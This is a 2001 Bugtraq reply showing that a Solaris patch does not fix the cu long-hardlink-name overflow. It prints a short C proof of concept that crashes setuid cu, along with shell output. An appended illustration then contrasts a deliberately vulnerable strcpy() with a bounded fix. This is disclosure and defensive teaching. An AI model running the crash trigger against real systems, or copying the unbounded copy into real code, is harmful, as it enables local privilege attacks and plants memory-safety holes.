[18862] in bugtraq
Re: Solaris /usr/bin/cu Vulnerability
daemon@ATHENA.MIT.EDU (Dan Harkless)
Tue Jan 30 13:20:40 2001
Message-Id: <200101300421.UAA17184@dilvish.speed.net>
Date: Mon, 29 Jan 2001 20:21:39 -0800
Reply-To: Dan Harkless <dan-bugtraq@DILVISH.SPEED.NET>
From: Dan Harkless <dan-bugtraq@DILVISH.SPEED.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: Message from hal King <hck@UTK.EDU> of "Tue, 23 Jan 2001 12:00:11 EST." <20010123120011.E2883@thag.utk.edu>
hal King <hck@UTK.EDU> writes:
> In Solaris 2.6, patch 106468-02 replaces cu; in Sol 7, patch 108372-01 replaces
> it, for gets() use. The script does segfault in 8, but no core file... I am
> running the 10/2000 revision and 108372 came out in May, so it's probably cool.
Are you implying the above patches fix the cu long hardlink name
vulnerability? This is not the case, at least on 2.6:
# cat > cu_exploit.c
#include <stdio.h>
#include <stdlib.h>     /* malloc, atoi */
#include <string.h>     /* memset */
#include <unistd.h>     /* execl */
void main(int argc,char **argv)
{
char *buf;
/* argv[1] = length of the fake argv[0] to hand to cu (required) */
buf = (char *) malloc(atoi(argv[1])*sizeof(char));
memset(buf,0x41,atoi(argv[1])-1);   /* fill with 'A' */
buf[atoi(argv[1])-1]=0;             /* NUL-terminate */
/* exec cu with the long string as its argv[0], which is what a long hardlink name gives it */
execl("/usr/bin/cu",buf,(char *)0);
}
# gcc cu_exploit.c
cu_exploit.c: In function `main':
cu_exploit.c:4: warning: return type of `main' is not `int'
# a.out
Segmentation fault
# uname -a
SunOS shell1 5.6 Generic_105181-23 sun4m sparc SUNW,SPARCstation-5
# showrev -p | fgrep 106468-02
Patch: 106468-02 Obsoletes: Requires: Incompatibles: Packages: SUNWbnuu
# pkgchk -p /usr/bin/cu
ERROR: /usr/bin/cu
permissions <4111> expected <0111> actual
106468-02 was a patch from last summer, fixing an unspecified (but
presumably different) security problem in cu and uustat.
----------------------------------------------------------------------
Dan Harkless | To prevent SPAM contamination, please
dan-bugtraq@dilvish.speed.net | do not mention this private email
SpeedGate Communications, Inc. | address in Usenet posts. Thank you.
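The mechanism the thread is arguing about, as an added illustration that is not code from the post above and not taken from Solaris cu (whose source is not shown here): a hypothetical setuid-style program that records its own name from argv[0]. The unbounded form crashes when argv[0] is longer than the buffer, exactly the input cu_exploit.c supplies; the bounded form beside it keeps only the basename, never writes past the buffer and reports truncation so the caller can refuse an oversized name. The 32-byte buffer size, the function names and the 'A' filler are assumptions for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the internal program-name buffer; hypothetical, not from cu. */
#define PROGNAME_MAX 32

/*
 * Vulnerable pattern (hypothetical): argv[0] is copied into a fixed stack
 * buffer with no length check. An argv[0] of PROGNAME_MAX bytes or more, as
 * the exploit in the post passes via execl(), overwrites whatever sits past
 * the buffer. Kept for contrast only; main() never calls it.
 */
void vuln_set_progname(const char *argv0)
{
    char name[PROGNAME_MAX];
    strcpy(name, argv0);            /* unbounded copy: the bug */
    printf("progname: %s\n", name);
}

/*
 * Hardened form: keep only the basename, copy at most outsz-1 bytes and
 * always NUL-terminate. Returns 1 if the name had to be truncated, 0 otherwise,
 * so the caller can log or reject an oversized argv[0] instead of trusting it.
 */
int safe_set_progname(const char *argv0, char *out, size_t outsz)
{
    const char *base = strrchr(argv0, '/');
    size_t n;
    int truncated;

    base = base ? base + 1 : argv0;
    n = strlen(base);
    truncated = (n >= outsz);
    if (outsz == 0)
        return truncated;
    if (truncated)
        n = outsz - 1;
    memcpy(out, base, n);
    out[n] = '\0';
    return truncated;
}

/*
 * Build an argv[0] the way cu_exploit.c does: len-1 bytes of 'A' followed by
 * a NUL. Constructed test input; the caller frees the result.
 */
char *make_long_name(size_t len)
{
    char *buf;
    if (len == 0)
        len = 1;
    buf = malloc(len);
    if (buf == NULL)
        return NULL;
    memset(buf, 'A', len - 1);
    buf[len - 1] = '\0';
    return buf;
}

int main(int argc, char **argv)
{
    size_t len = (argc > 1) ? strtoul(argv[1], NULL, 10) : 4096;
    char out[PROGNAME_MAX];
    char *name = make_long_name(len);
    int truncated;

    if (name == NULL)
        return 1;
    truncated = safe_set_progname(name, out, sizeof out);
    printf("argv[0] of %zu bytes -> stored %zu bytes, truncated=%d\n",
           strlen(name), strlen(out), truncated);
    free(name);
    return 0;
}
```

Run it with the same length you would give cu_exploit.c (for example `./a.out 4096`): the bounded version stores 31 bytes and reports truncation, where the strcpy() version would have walked off the end of its 32-byte buffer. Note that the pkgchk output in the post shows cu with the setuid bit already removed (0111 actual against 4111 expected), which is the usual interim mitigation when a patch does not actually cover the overflow.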